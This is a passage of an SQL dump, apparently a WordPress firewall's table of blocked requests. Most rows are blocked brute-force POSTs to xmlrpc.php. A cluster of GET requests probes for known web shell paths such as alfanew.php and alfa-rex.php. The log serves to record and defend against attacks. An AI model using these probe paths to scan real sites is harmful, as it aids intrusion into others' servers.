Safari\\/537.36\"}','8oXmvdiQ4qhY3A6f2GsERWwL',0,1681152309.9317,605,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','MEYU1BCaOA84LqRc7PkGnQtI',0,1681152312.4775,629,'','POST',403,0,515,0,1,'',0),('103.169.35.181',1739137973,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','16DFt2sMCfqhPElNowceLzBH',0,1681152318.3977,571,'','POST',403,0,515,0,1,'',0),('103.130.218.158',1736628894,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','MaOIWJsdP6b1q4we7CYmiGnl',0,1681152319.7314,603,'','POST',403,0,515,0,1,'',0),('185.200.117.131',3116922243,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','covqWDf5MzAr8xG4ZBTSUIwH',0,1681152949.2476,3768,'','POST',403,0,515,0,1,'',0),('213.152.161.69',3583549765,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4ZdPfpsQLzkeXmFrt6CD82Hw',0,1681154282.9789,4638,'','POST',403,0,515,0,1,'',0),('141.98.101.133',2372035973,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ureIAPoDhcCan4F5Mlvp0y3x',0,1681155558.6423,1021,'','POST',403,0,515,0,1,'',0),('213.152.161.5',3583549701,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nEJzHrNVyifSmB64UPwCag10',0,1681155920.6028,5424,'','POST',403,0,515,0,1,'',0),('62.102.148.164',1046910116,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BnTAQ7hzfkWyqFCaue0lLVSG',0,1681156156.4998,2730,'','POST',403,0,515,0,1,'',0),('68.235.52.36',1156264996,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QAoTtfIn6EPaHKyl2eS5cFUq',0,1681156800.4355,4223,'','POST',403,0,515,0,1,'',0),('104.254.90.243',1761499891,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cCaX0m8S7gDwE1J3uinYfKUx',0,1681157600.7402,3853,'','POST',403,0,515,0,1,'',0),('62.102.148.187',1046910139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Po7VEULrsgKv6kqjIXRtQOG8',0,1681157983.1891,4058,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','5iWed7jDh2N0HLsbyORVtpY3',0,1681158041.2946,4259,'','POST',403,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','ULwbYCaV7pJWtH9R4G0ZOEqX',0,1681158044.3934,1868,'','POST',403,0,515,0,1,'',0),('91.134.248.211',1535572179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ikmfcTFDY6wHILutrSMxaK9q',0,1681158043.0727,3305,'','POST',403,0,515,0,1,'',0),('45.130.229.130',763553154,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','idUZoshGvWIef7Snu1QrJpmc',0,1681158048.8125,614,'','POST',403,0,515,0,1,'',0),('39.108.51.67',661402435,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Rl5FPhGBeSzJ8cg617OfCwQk',0,1681158053.1864,617,'','POST',403,0,515,0,1,'',0),('95.111.255.131',1601175427,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','PRBZhuNlzrKgLTQxpnVdFbY7',0,1681158060.6297,606,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','2Q6ckJpfavzgdAiKbI48NmLF',0,1681158061.5998,580,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','KlIobvwQmEB9usXOnMWcR3jL',0,1681158062.7240,623,'','POST',403,0,515,0,1,'',0),('185.98.5.176',3110208944,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','4CjZwS2Bl3t9pkEiLFAxa5yG',0,1681158065.8510,640,'','POST',403,0,515,0,1,'',0),('104.37.86.31',1747277343,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','K4xsJOVgR1drHYTtF7lvShBP',0,1681158068.3639,637,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','L9BkvxAiVaSEb2u3zXDIn8oF',0,1681158078.3676,840,'','POST',403,0,515,0,1,'',0),('82.102.23.131',1382422403,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MWbAYgyrpeBsx7Z06IU1wqi4',0,1681160113.3949,4217,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','LHauRrh2EZdiYC0Oyt4K378A',0,1681160712.7482,1603,'','POST',403,0,515,0,1,'',0),('74.208.57.218',1255160282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','jHpV6dIK0rslEYXBUO5Wb3P4',0,1681160709.6876,5586,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','E8gt1SZyQ5pfi2abVxzLK7R4',0,1681160714.6845,1314,'','POST',403,0,515,0,1,'',0),('46.101.4.25',778372121,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','zT20km9soLAuQbpUnZyPdl3B',0,1681160721.1473,580,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','SboNDWvz5kJRwdE36x98iXqj',0,1681160727.9209,598,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','2N45KihFoCw0u7HGAkUqbzvJ',0,1681160729.7015,570,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','q6Go9yOBpF4EwHcUQduLTjni',0,1681160736.4454,1686,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','EdHQrUCjp4uxcBhFyDOP0nAL',0,1681160745.5355,587,'','POST',403,0,515,0,1,'',0),('37.46.117.90',623801690,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dUhBlPJSQ6m7ofOyisnMWLRk',0,1681161584.2569,6221,'','POST',403,0,515,0,1,'',0),('104.254.90.235',1761499883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uzMtxUEOjwLgovWBZyKPlkCr',0,1681161847.5397,4461,'','POST',403,0,515,0,1,'',0),('104.254.90.235',1761499883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FumyAhjvcGUeIM4pWOkZEb3s',0,1681161975.7827,3749,'','POST',403,0,515,0,1,'',0),('213.152.186.173',3583556269,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','HaeXpN9PEj7imZlFfycurIDb',0,1681162961.3520,3979,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','zm2ltXH9P6qEOn8YFvydBa5S',0,1681163014.6078,1044,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','vGytuc80w9Z3gqTpYS7EO6sJ',0,1681163020.8526,558,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','T7d1P6jVKAZhqLgiFyBzRwp4',0,1681163027.6951,589,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','FyfOqGZlRm2TwPEjK56adoph',0,1681163031.2075,558,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','zYtnNIZ5OTKFWfEjyDLwxrko',0,1681163041.5664,710,'','POST',403,0,515,0,1,'',0),('157.245.147.60',2650116924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','qiTDx0m4bgVvnea5L9H1RZj8',0,1681163043.3443,1412,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','fD7APTgtm6QEFuVq21GlYiH4',0,1681163043.5855,1303,'','POST',403,0,515,0,1,'',0),('3.231.146.243',65508083,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','E80GUAkNMvmL3pfCsiXbdWhI',0,1681163053.5491,610,'','POST',403,0,515,0,1,'',0),('198.54.114.123',3325457019,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','brph45XDwzHxaIgUqmFcPBW8',0,1681163055.0694,606,'','POST',403,0,515,0,1,'',0),('120.79.227.91',2018501467,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','cVZfp0svaQX2LEK1ebH8FSnI',0,1681163060.8965,640,'','POST',403,0,515,0,1,'',0),('68.183.179.155',1152889755,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','MR7ApLI348WSgENvFcGKPsDU',0,1681164072.6510,3727,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','nRcjbxetDqT2YO597UaydulG',0,1681164068.8576,8483,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','c6gmHiSy04ZeF2p5GWKjYBou',0,1681164074.5661,3197,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','W6ipTkZF29hEJomlXwLVrPs8',0,1681164082.0376,603,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','Nqb5KSJysu07aCEiUX21B4jk',0,1681164087.6891,627,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','OxTu6VUevkjm48oMXIdN0bWc',0,1681164091.0383,630,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','OIzKQZ3HdpqEJ6Csj87bw4xV',0,1681164092.4080,696,'','POST',403,0,515,0,1,'',0),('37.120.217.243',628677107,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qLGfphKIDceE6FXuZkown3Yd',0,1681164102.9650,636,'','POST',403,0,515,0,1,'',0),('213.152.162.5',3583549957,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0u4h6vefrJYBlgo9zaxDsAtT',0,1681165851.4716,6672,'','POST',403,0,515,0,1,'',0),('118.193.38.180',1992369844,'','http://cmdev-site1.com.corridormediadesign.com/d1/OK.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; vivo 1906; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/87.0.4280.141 Mobile Safari\\/537.36 VivoBrowser\\/8.9.0.0\",\"2\":\"http:\\/\\/cmdev-site1.com.corridormediadesign.com\\/d1\\/OK.php\"}','ROLzWC0Zqij4Ygmrn7M1Ix3v',0,1681166323.2454,15995,'','GET',403,0,700,0,1,'',0),('89.238.166.235',1508812523,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4EabQT0nHphiK6M5SyzoRvUX',0,1681167016.1481,6027,'','POST',403,0,515,0,1,'',0),('200.17.137.52',3356592436,'','http://cmdev-site1.com/wp-content/plugins/seooo/alfanew.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','ig9CF7KnLezHM8YuZ4ftpoj6',0,1681167115.1217,1490,'','GET',403,0,700,0,1,'',0),('162.241.157.186',2733743546,'','http://cmdev-site1.com/admin.php?u=t','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','kScAqznZdhj10QXVgWN8GPYK',0,1681167134.8966,296,'','GET',403,0,700,0,1,'',0),('14.63.221.211',239066579,'','http://cmdev-site1.com/wp-content/wp-login.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','7fEVwgrkjLnRZ2DmbN1T0lSh',0,1681167135.7152,339,'','GET',403,0,700,0,1,'',0),('162.241.157.186',2733743546,'','http://cmdev-site1.com/alfa-rex.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','lh7IafAunE4sMrF31ePQLobN',0,1681167136.8529,728,'','GET',403,0,700,0,1,'',0),('200.17.137.52',3356592436,'','http://cmdev-site1.com/wp-content/uploads/index.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','qmfOFblLuj1yVDiSxHsB5hda',0,1681167136.9702,691,'','GET',403,0,700,0,1,'',0),('162.241.157.186',2733743546,'','http://cmdev-site1.com/library.php?check=t','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','wV19sS7QCGWMLzmihxJY5gte',0,1681167205.7665,1462,'','GET',403,0,700,0,1,'',0),('200.17.137.52',3356592436,'','http://cmdev-site1.com/wp-content/themes/finley/alfanew.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','8YbyeJ9UWwRNVsoO5iAPmIEl',0,1681167212.1241,300,'','GET',403,0,700,0,1,'',0),('162.241.157.186',2733743546,'','http://cmdev-site1.com/alfanew.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','LxvyWJficSMkV34e2zpY9Pw0',0,1681167215.6193,307,'','GET',403,0,700,0,1,'',0),('200.17.137.52',3356592436,'','http://cmdev-site1.com/wp-content/uploads/radio.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','vO58EMsnNXcmDYWxPyJoUL6z',0,1681167247.3684,1486,'','GET',403,0,700,0,1,'',0),('37.59.42.94',624634462,'','http://cmdev-site1.com/wp-content/plugins/Cache/dropdown.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','cKfTiNbsazVQBLkdFIUMSe43',0,1681167252.0016,648,'','GET',403,0,700,0,1,'',0),('162.241.157.186',2733743546,'','http://cmdev-site1.com/style.php?sig=rename&rename=123&source_name=qw123','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','jnb92MxIVYE1vgJ46HreWSqU',0,1681167323.5031,1685,'','GET',403,0,700,0,1,'',0),('37.59.42.94',624634462,'','http://cmdev-site1.com/wp-content/plugins/Cache/alfa-rex.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','Uv2RsftgaOCZuqI5SH8WdYpr',0,1681167405.1282,1658,'','GET',403,0,700,0,1,'',0),('37.59.42.94',624634462,'','http://cmdev-site1.com/wp-content/plugins/seooo/alfa-rex.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','jnUtJ4KYMSsBTN8IfwDWFzg1',0,1681167472.0013,1480,'','GET',403,0,700,0,1,'',0),('37.59.42.94',624634462,'','http://cmdev-site1.com/wp-content/plugins/Cache/alfanew.php?1958','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cmdev-site1.com\"}','Rmqv45SVCEZjut0JnAMh6TsI',0,1681167626.0987,1466,'','GET',403,0,700,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','srD1wHJ0Z4duUtgnXzoj5a8x',0,1681168133.8946,3456,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','652VwXUMzT4gDmalFHeWO3BI',0,1681168135.4141,2448,'','POST',403,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','9hjQfCSpyXZkJGwRltreFYML',0,1681168135.8591,2289,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','A1G5RWboBHrNZlY0a7QxhJMi',0,1681168150.7979,4561,'','POST',403,0,515,0,1,'',0),('66.248.237.41',1123609897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','AuqyIWRgFOkPmVUbQEeZKxCf',0,1681168155.2961,1346,'','POST',403,0,515,0,1,'',0),('185.198.27.128',3116768128,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','hKQPb6YZDwTGsJNVk1fOpvtu',0,1681168155.5857,1229,'','POST',403,0,515,0,1,'',0),('104.37.86.31',1747277343,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','CF465veUSMV3cjP2OgxLT8d9',0,1681168161.6860,667,'','POST',403,0,515,0,1,'',0),('51.195.105.117',868444533,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','JcrenKDdNhWlYitfO0mjGxwv',0,1681168168.3947,627,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','b2HcNsphXEd6KzSjUZtO8Mlx',0,1681168171.9325,597,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) 